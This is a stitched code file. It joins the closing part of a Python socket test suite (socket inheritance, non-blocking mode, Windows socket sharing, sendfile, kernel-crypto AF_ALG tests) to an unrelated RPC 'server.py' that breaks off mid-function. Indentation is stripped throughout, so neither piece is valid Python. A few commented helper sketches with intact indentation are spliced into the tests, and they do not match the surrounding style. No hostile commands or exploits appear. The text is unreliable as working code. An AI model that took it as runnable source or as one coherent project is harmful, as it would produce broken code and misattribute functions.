@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
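# Illustrative sketch (POSIX-only, ours): reading the O_NONBLOCK file-status
# flag that checkNonblock() inspects above.  As the comments in that helper
# explain, a socket with a positive timeout reports getblocking() == True
# while its file descriptor is nevertheless in non-blocking mode.
def _sketch_fd_nonblock_flag():
    import fcntl
    import os
    import socket
    s = socket.socket()
    try:
        s.settimeout(2.0)
        flags = fcntl.fcntl(s.fileno(), fcntl.F_GETFL)
        fd_nonblocking = bool(flags & os.O_NONBLOCK)
        return s.getblocking(), fd_nonblocking      # expected: (True, True)
    finally:
        s.close()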
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# Socket sharing is expected to work only for blocking sockets,
# since the internal Python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then Windows will internally
# have picked the correct value.  Python introspection on the socket,
# however, will still return 0.  For the shared socket, the Python
# value is recreated from the actual value, so the two may not compare
# equal.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
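# Illustrative sketch (Windows-only, ours): the share()/fromshare() round
# trip that TestSocketSharing performs.  share() serialises the protocol
# information for a target pid and fromshare() rebuilds a usable socket from
# those bytes; here both ends are the current process, as in testShareLocal.
def _sketch_share_roundtrip():
    import os
    import socket
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        listener.bind(("127.0.0.1", 0))
        listener.listen()
        data = listener.share(os.getpid())      # bytes destined for that pid
        clone = socket.fromshare(data)
        try:
            return clone.getsockname() == listener.getsockname()
        finally:
            clone.close()
    finally:
        listener.close()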
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(MAIN_TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
with open(support.TESTFN, 'rb') as file:
with socket.create_connection(address) as sock:
sock.settimeout(0.01)
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
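# Illustrative sketch (ours): the public socket.sendfile() entry point that
# the two test classes above exercise through its private helpers.  It sends
# a file opened in binary mode over a connected SOCK_STREAM socket, using
# os.sendfile() where available and falling back to send() otherwise.  The
# path and address arguments are assumptions for the example.
def _sketch_sendfile(path, address=("127.0.0.1", 8080)):
    import socket
    with open(path, "rb") as f, socket.create_connection(address) as sock:
        return sock.sendfile(f, offset=0, count=None)   # returns bytes sent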
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer, the test blocks on
# Ubuntu 15.10 with kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_length_restriction(self):
# bpo-35050, off-by-one error in length check
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
self.addCleanup(sock.close)
# salg_type[14]
with self.assertRaises(FileNotFoundError):
sock.bind(("t" * 13, "name"))
with self.assertRaisesRegex(ValueError, "type too long"):
sock.bind(("t" * 14, "name"))
# salg_name[64]
with self.assertRaises(FileNotFoundError):
sock.bind(("type", "n" * 63))
with self.assertRaisesRegex(ValueError, "name too long"):
sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available for a long time
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
class CreateServerTest(unittest.TestCase):
def test_address(self):
port = support.find_unused_port()
with socket.create_server(("127.0.0.1", port)) as sock:
self.assertEqual(sock.getsockname()[0], "127.0.0.1")
self.assertEqual(sock.getsockname()[1], port)
if support.IPV6_ENABLED:
with socket.create_server(("::1", port),
family=socket.AF_INET6) as sock:
self.assertEqual(sock.getsockname()[0], "::1")
self.assertEqual(sock.getsockname()[1], port)
def test_family_and_type(self):
with socket.create_server(("127.0.0.1", 0)) as sock:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
if support.IPV6_ENABLED:
with socket.create_server(("::1", 0), family=socket.AF_INET6) as s:
self.assertEqual(s.family, socket.AF_INET6)
self.assertEqual(s.type, socket.SOCK_STREAM)
def test_reuse_port(self):
if not hasattr(socket, "SO_REUSEPORT"):
with self.assertRaises(ValueError):
socket.create_server(("localhost", 0), reuse_port=True)
else:
with socket.create_server(("localhost", 0)) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertEqual(opt, 0)
with socket.create_server(("localhost", 0), reuse_port=True) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertNotEqual(opt, 0)
@unittest.skipIf(not hasattr(_socket, 'IPPROTO_IPV6') or
not hasattr(_socket, 'IPV6_V6ONLY'),
"IPV6_V6ONLY option not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_ipv6_only_default(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6) as sock:
assert sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dualstack_ipv6_family(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.assertEqual(sock.family, socket.AF_INET6)
class CreateServerFunctionalTest(unittest.TestCase):
timeout = 3
def setUp(self):
self.thread = None
def tearDown(self):
if self.thread is not None:
self.thread.join(self.timeout)
def echo_server(self, sock):
def run(sock):
with sock:
conn, _ = sock.accept()
with conn:
event.wait(self.timeout)
msg = conn.recv(1024)
if not msg:
return
conn.sendall(msg)
event = threading.Event()
sock.settimeout(self.timeout)
self.thread = threading.Thread(target=run, args=(sock, ))
self.thread.start()
event.set()
def echo_client(self, addr, family):
with socket.socket(family=family) as sock:
sock.settimeout(self.timeout)
sock.connect(addr)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
def test_tcp4(self):
port = support.find_unused_port()
with socket.create_server(("", port)) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_tcp6(self):
port = support.find_unused_port()
with socket.create_server(("", port),
family=socket.AF_INET6) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
# --- dual stack tests
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v4(self):
port = support.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v6(self):
port = support.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest,
UDPTimeoutTest, CreateServerTest, CreateServerFunctionalTest]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(BasicBluetoothTest)
tests.append(LinuxKernelCryptoAPI)
tests.append(BasicQIPCRTRTest)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
server.py
|
#
# author: Cosmin Basca
#
# Copyright 2010 University of Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABCMeta, abstractmethod, abstractproperty
from collections import OrderedDict
from threading import Thread
from time import sleep
from cherrypy import engine
from tornado.netutil import bind_sockets
from cherrypy.wsgiserver import CherryPyWSGIServer
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado import ioloop
from asyncrpc.wsgi import RpcRegistryMiddleware, RpcRegistryViewer, ping_middleware, RpcInstanceMiddleware, \
info_middleware
from asyncrpc.registry import Registry
from asyncrpc.log import debug, warn, info, error
from werkzeug.wsgi import DispatcherMiddleware
from werkzeug.debug import DebuggedApplication
from requests import get, post, RequestException
# ----------------------------------------------------------------------------------------------------------------------
#
# Base RPC Server
#
# ----------------------------------------------------------------------------------------------------------------------
class RpcServer(object):
__metaclass__ = ABCMeta
def __init__(self, address, *args, **kwargs):
if isinstance(address, (tuple, list)):
host, port = address
elif isinstance(address, (str, unicode)):
host, port = address.split(':')
port = int(port)
else:
            raise ValueError('address must be either a (host, port) tuple/list or a "host:port" string')
self._address = (host, port)
@property
def port(self):
return self._address[1]
@property
def host(self):
return self._address[0]
@property
def address(self):
return self._address
@abstractmethod
def stop(self):
pass
@abstractproperty
def bound_address(self):
pass
@abstractmethod
def server_forever(self, *args, **kwargs):
pass
def start(self, *args, **kwargs):
self.server_forever(*args, **kwargs)
def server_is_online(address, method='get', log_error=True):
if isinstance(address, (tuple, list)):
host, port = address
elif isinstance(address, (str, unicode)):
host, port = address.split(':')
port = int(port)
else:
        raise ValueError('address must be either a (host, port) tuple/list or a "host:port" string')
_http = get if method == 'get' else post
try:
response = _http('http://{0}:{1}/ping'.format(host, port))
if response.status_code == 200:
return response.content.strip().lower() == 'pong'
return False
except RequestException as ex:
if log_error:
error('got an exception while checking if server is online: %s', ex)
return False
def wait_for_server(address, method='get', check_every=0.5, timeout=None, to_start=True):
def _test():
return server_is_online(address, method=method, log_error=False) == to_start
def _wait():
while True:
sleep(check_every)
# noinspection PyBroadException
try:
if _test():
break
except Exception:
pass
stopper = Thread(target=_wait)
stopper.daemon = True
stopper.start()
